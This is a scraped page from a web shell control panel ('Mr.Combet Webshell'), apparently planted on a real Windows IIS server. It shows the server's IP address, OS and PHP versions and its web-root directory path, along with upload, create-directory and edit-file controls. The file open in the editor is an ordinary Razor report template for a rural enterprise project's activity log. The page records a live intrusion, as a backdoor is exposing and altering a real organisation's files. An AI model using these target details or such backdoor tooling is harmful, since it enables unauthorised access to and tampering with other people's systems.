Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
mapqa
/
Views
/
ReportManagment
/
Edit File Name :
DownloadActivityLogSelf.cshtml
@model RER_Project.DataAccess.ViewModels.WorkPlanSelf.ActivityLogSelfVM @{ Layout = "../shared/_reportlayout.cshtml"; } @section ReportStyles{ } <center> <h2>Rural Enterprises and Remittances Project(RERP)</h2> <h3>SAMRIDDHI</h3> <h4>Activity Log</h4> </center> <br /> <div class="row"> <div class="col-xs-4"> Name : <strong>@Model.UserName</strong> </div> <div class="col-xs-4"> Position : <strong>@Model.Position</strong> </div> <div class="col-xs-4"> Year/Month : <strong>@Model.YearName / @Model.MonthName</strong> </div> </div> <table class="table"> <thead> <tr> <th>Date</th> <th>Tasks Performed</th> <th>Remarks</th> </tr> </thead> <tbody> @foreach (var item in Model.ActivityLogSelf) { <tr> <td>@item.LogDateNepali</td> <td>@Html.Raw(item.TaskPerformedStatus)</td> <td></td> </tr> } </tbody> </table> <br /> <br /><br /><br /> <center> <div class="row"> <div class="col-xs-4"> Prepared By </div> <div class="col-xs-4"> Verified By </div> <div class="col-xs-4"> Approved By </div> </div> </center>
Save